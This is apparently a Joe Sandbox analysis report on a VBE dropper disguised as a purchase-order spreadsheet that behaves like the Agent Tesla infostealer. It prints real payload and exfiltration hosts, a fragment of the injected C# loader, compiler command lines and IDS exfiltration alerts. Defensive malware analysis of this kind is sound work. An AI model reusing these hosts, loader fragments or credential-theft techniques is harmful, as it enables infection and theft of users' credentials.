          LSA Secrets351
          Virtualization/Sandbox Evasion
          SSHKeyloggingData Transfer Size Limits23
          Application Layer Protocol
          Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Masquerading
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items351
          Virtualization/Sandbox Evasion
          DCSync1
          System Network Configuration Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
          Process Injection
          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 755441 Sample: PO-08784 xlsx.vbe Startdate: 28/11/2022 Architecture: WINDOWS Score: 100 35 ftp.mcmprint.net 2->35 37 b3solutionscws.com 2->37 39 2 other IPs or domains 2->39 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Antivirus detection for URL or domain 2->51 53 5 other signatures 2->53 9 wscript.exe 1 1 2->9         started        signatures3 process4 signatures5 63 Wscript starts Powershell (via cmd or directly) 9->63 65 Obfuscated command line found 9->65 67 Very long command line found 9->67 12 powershell.exe 25 9->12         started        16 cmd.exe 1 9->16         started        process6 file7 33 C:\Users\user\AppData\...\3uneeqsg.cmdline, Unicode 12->33 dropped 69 Tries to detect Any.run 12->69 71 Hides threads from debuggers 12->71 18 CasPol.exe 15 12 12->18         started        22 csc.exe 3 12->22         started        25 conhost.exe 12->25         started        27 conhost.exe 16->27         started        signatures8 process9 dnsIp10 41 ftp.mcmprint.net 185.31.121.136, 21, 49807, 49808 RAX-ASBG Bulgaria 18->41 43 b3solutionscws.com 192.185.145.188, 49803, 80 UNIFIEDLAYER-AS-1US United States 18->43 45 api.ipify.org.herokudns.com 54.91.59.199, 443, 49805 AMAZON-AESUS United States 18->45 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->55 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->57 59 Tries to steal Mail credentials (via file / registry access) 18->59 61 5 other signatures 18->61 31 C:\Users\user\AppData\Local\...\3uneeqsg.dll, PE32 22->31 dropped 29 cvtres.exe 1 22->29         started        file11 signatures12 process13

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          PO-08784 xlsx.vbe2%VirustotalBrowse
          PO-08784 xlsx.vbe2%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          api.ipify.org.herokudns.com0%VirustotalBrowse
          ftp.mcmprint.net10%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfb0%Avira URL Cloudsafe
          http://oqyPj4HORVpk3nSGGk.net0%Avira URL Cloudsafe
          http://kmbImL.com0%Avira URL Cloudsafe
          http://pesterbdd.com/images/Pester.png100%Avira URL Cloudmalware
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://oqyPj4HORVpk3nSGGk.netXy0%Avira URL Cloudsafe
          https://api.ipify.orgftp://ftp.mcmprint.netklogz0%Avira URL Cloudsafe
          https://contoso.com/0%Avira URL Cloudsafe
          https://contoso.com/License0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
          http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
          https://contoso.com/Icon0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          api.ipify.org.herokudns.com
          54.91.59.199
          truefalseunknown
          ftp.mcmprint.net
          185.31.121.136
          truetrueunknown
          b3solutionscws.com
          192.185.145.188
          truefalse
            unknown
            api.ipify.org
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
                high
                http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfbfalse
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://kmbImL.comCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://127.0.0.1:HTTP/1.1CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://api.ipify.orgCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://oqyPj4HORVpk3nSGGk.netCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://oqyPj4HORVpk3nSGGk.netXyCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://api.ipify.orgftp://ftp.mcmprint.netklogzCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://contoso.com/powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Licensepowershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://contoso.com/Iconpowershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              54.91.59.199
                              api.ipify.org.herokudns.comUnited States
                              14618AMAZON-AESUSfalse
                              192.185.145.188
                              b3solutionscws.comUnited States
                              46606UNIFIEDLAYER-AS-1USfalse
                              185.31.121.136
                              ftp.mcmprint.netBulgaria
                              199364RAX-ASBGtrue
                              Joe Sandbox Version:36.0.0 Rainbow Opal
                              Analysis ID:755441
                              Start date and time:2022-11-28 18:09:14 +01:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 17m 46s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:PO-08784 xlsx.vbe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:22
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winVBE@13/10@3/3
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .vbe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
                              • TCP Packets have been reduced to 100
                              • Excluded IPs from analysis (whitelisted): 52.242.97.97, 40.125.122.151
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              No simulations
                              No context
                              No context
                              No context
                              No context
                              No context
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8003
                              Entropy (8bit):4.841989710132343
                              Encrypted:false
                              SSDEEP:192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
                              MD5:677C4E3A07935751EA3B092A5E23232F
                              SHA1:0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
                              SHA-256:D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
                              SHA-512:253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
                              Malicious:false
                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1075), with no line terminators
                              Category:dropped
                              Size (bytes):1078
                              Entropy (8bit):4.940853242499253
                              Encrypted:false
                              SSDEEP:24:JVSRTQ1BI7kKMy6k1Ahr0n8rsvJmsIpLnH:JV6TIBAXyuM08rsvJmsCLnH
                              MD5:D697E139982C89FE5B0FD2410BE24D8A
                              SHA1:A4436350800275EAB95B8C9FFF79C1A5AA3D5783
                              SHA-256:7665F657D3972656C1ACBD5C46C4E1886F2CB8B427C0996BC78A34DCCF00C459
                              SHA-512:8E1E55545B9B893D28FDF82C9A5122F35531CB3AB35A5C9CBA05FC52227BCD4F69513C07EE8EA2DEB02BC9F059116103228A9F7A480BEADA2FD153F937E3A726
                              Malicious:false
                              Preview:.using System;using System.Runtime.InteropServices;public static class Methyl1 {[DllImport("kernel32")]public static extern int GetThreadTimes(int Progr82,int Fremad,int Tele,int Tredi,int Tim);[DllImport("user32")]public static extern int ClientToScreen(int Inkorp,int tekno);[DllImport("kernel32")]public static extern int ExpandEnvironmentStrings(int Rotte,int Bul,int Ento);[DllImport("user32")]public static extern int EnumChildWindows(int Lithed,int Diobo,int Alung);[DllImport("winmm.dll")]public static extern int joySetCapture(int Kodif,int Vej,int Empti,int Reacti);[DllImport("kernel32")]public static extern void GlobalMemoryStatus(int Anlgsi);[DllImport("kernel32")]public static extern int IsValidCodePage(int Gaum);[DllImport("kernel32")]public static extern int HeapReAlloc(int Hand,int Fals,int Hung,int Under);[DllImport("gdi32")]public static extern int CreateSolidBrush(int For);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImpor
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                              Category:dropped
                              Size (bytes):371
                              Entropy (8bit):5.211213369657342
                              Encrypted:false
                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23ftVbBH0zxs7+AEszICN23ftVbDH:p37Lvkmb6KmDaWZE7DPH
                              MD5:4D7761BC538C78315CB0B7D49537A004
                              SHA1:8F0E7A3303C282F2B1859F63EB37BFE801B35B7C
                              SHA-256:8422ADE6961B4092DDA6D9EF5C6AC15F621CB0803D19AB8197A5DA777928FC18
                              SHA-512:DAB197A4D3289F2996403152E6D60658473BB3611F050851050381A26A77AB477B09C5AA99E2C4440ABA54EB015B16C758C5DA91A228B5BD12AFDD948955DC26
                              Malicious:true
                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.0.cs"
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):4096
                              Entropy (8bit):3.052799017232693
                              Encrypted:false
                              SSDEEP:24:etGShEoL4q2fP+8cX7uAwOCTO7Ax+ilZZXaIXedLo1TtkF/K4NmWI+ycuZhN/nam:6hXpwPNYcYLIZT+1F/K61ul/na3Goq
                              MD5:140A93F45C268888BF601F03CA80BB29
                              SHA1:A52983EFA9A949F18AAECE009A03325E63C4430B
                              SHA-256:14B4DF06BE100518F7749895EE293E3E5BDD8156DF81166CAB0B9600743B565E
                              SHA-512:9D589B9F809D0F07530DA0B6F9EC1F4DBE55EF36F7E1CAFA33D949E70316245BC17EAEABCF7E564093F88A89BE00C4856A8D4F4F161C0C2654BCBBC202DB8C6F
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K..c...........!................N&... ...@....... ....................................@..................................&..K....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H.......P ..............................................................BSJB............v4.0.30319......l...|...#~......@...#Strings....(.......#US.0.......#GUID...@...p...#Blob...........G.........%3............................................................/.(...................................................... 6............ E............ T............ m............ ~. .......... ..(.......... ..-.......... .. .......... ..-.......... .. .......... ..2...................
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):866
                              Entropy (8bit):5.303224718050824
                              Encrypted:false
                              SSDEEP:24:Aqd3ka6KmD7E7DPOKax5DqBVKVrdFAMBJTH:Aika6PnE7qK2DcVKdBJj
                              MD5:551FF17659DB1C1CA656A1F4C542C140
                              SHA1:1E5F30CB2A4C2E238AB6903A0EAB87219D3EE125
                              SHA-256:001FACBC1F52BE24790C07EB1AAFD087CBB9395871F486C1DDE62B22CF2C71D0
                              SHA-512:BA9EDEF5F25DF7066AC9CE71F7FC1910B5C02978708C72E9DCCDC82AC6C0E274D0CF5DA9B42E54D49593508FB5CC5F8FF856BEF7FB8E0BE1993EF259F41E38D0
                              Malicious:false
                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):652
                              Entropy (8bit):3.087847912769416
                              Encrypted:false
                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqgIYak7YnqqxgINPN5Dlq5J:+RI+ycuZhN/nakSGwPNnqX
                              MD5:34955465138EB2BC53DC0D26D39005E8
                              SHA1:200065A3FB120DB014BB5FBB910EAAF74060C879
                              SHA-256:CD95882F97D1A9AFF3A338D8AC93C25ABFB81237A4A0B316B3556908B9A58822
                              SHA-512:732124C01B2B5F3716020DAE3BFB814B9F0575AEDA82BED745AD9A18F57A9676846974938B35DB07A9EB6B8826A1D91E70AEEFEFCAE608B66D0F27CFD8F6B8FF
                              Malicious:false
                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.u.n.e.e.q.s.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.u.n.e.e.q.s.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Nov 28 18:13:31 2022, 1st section name ".debug$S"
                              Category:dropped
                              Size (bytes):1328
                              Entropy (8bit):3.9874853720027996
                              Encrypted:false
                              SSDEEP:24:HMe9E2vpIlKcq9dHvAFwKPfwI+ycuZhN/nakSGwPNnqSqd:HO1q3xKPo1ul/na3GoqSK
                              MD5:3C6943A93469F3893ADFC0D016FE02A8
                              SHA1:74F78D59A92AE02CDED002086A1C361761C99C92
                              SHA-256:1823732D123E9C67B5733D7BB0FB0A20BF8636ED9F70A89D2DEEEBEABF468A38
                              SHA-512:6E614BB0D63C0FDBF8B837DCE5807FD1263753912535A4090A39AA427ACACA4FC180682DC572060A2B21ECC28B5250B6D81F3897C376816F98F118A938D06B06
                              Malicious:false
                              Preview:L...K..c.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP...............4.Te....S..&.............5.......C:\Users\user\AppData\Local\Temp\RES6FA6.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.u.n.e.e.q.s.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):30
                              Entropy (8bit):3.964735178725505
                              Encrypted:false
                              SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                              MD5:9F754B47B351EF0FC32527B541420595
                              SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                              SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                              SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                              Malicious:false
                              Preview:NordVPN directory not found!..
                              File type:ASCII text, with CRLF line terminators
                              Entropy (8bit):5.855492842209971
                              TrID:
                                File name:PO-08784 xlsx.vbe
                                File size:352659
                                MD5:266115592f966240c14dfeeec624bdf5
                                SHA1:455a06b52d8e8f46d9a80067d3d1b1ea23036d65
                                SHA256:1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2
                                SHA512:951e630a3faca243913ef3955fda178356ab1fbab1dc236c9ef6db096fc1c48b517bcce5b9964f72de213787aca6f9acdeb71fe669119f435088e2c9dcb47e7e
                                SSDEEP:6144:JRYNxYchRj8pwdtWU4QfN+jWR4MvMsLYstdy2BxV72Q8qE+dRLzHb4HZIKK:jwhRjNtWU4vWRDvtEIy0xV7tNnRW6KK
                                TLSH:D874AEB1993126244D0F130BAB861AC48CE937E71513232D5DABF78D2633F4F926E6D9
                                File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
                                Icon Hash:e8d69ece869a9ec4
                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                192.168.11.20185.31.121.13649807212029927 11/28/22-18:14:18.239839TCP2029927ET TROJAN AgentTesla Exfil via FTP4980721192.168.11.20185.31.121.136
                                192.168.11.20185.31.121.13649808564112851779 11/28/22-18:14:18.274476TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4980856411192.168.11.20185.31.121.136
                                TimestampSource PortDest PortSource IPDest IP
                                Nov 28, 2022 18:14:03.133449078 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.247994900 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.248229027 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.248883963 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.363363981 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371316910 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371407032 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371470928 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371532917 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371570110 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.371597052 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371643066 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.371643066 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.371663094 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371726990 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371767998 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.371767998 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.371789932 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371835947 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.371854067 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371920109 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.371956110 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.372128963 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486287117 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486327887 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486346960 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486371994 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486390114 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486406088 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486506939 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486511946 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486512899 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486512899 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486515999 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486542940 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486560106 CET8049803192.185.145.188192.168.11.20
                                Nov 28, 2022 18:14:03.486576080 CET4980380192.168.11.20192.185.145.188
                                Nov 28, 2022 18:14:03.486587048 CET8049803192.185.145.188192.168.11.20
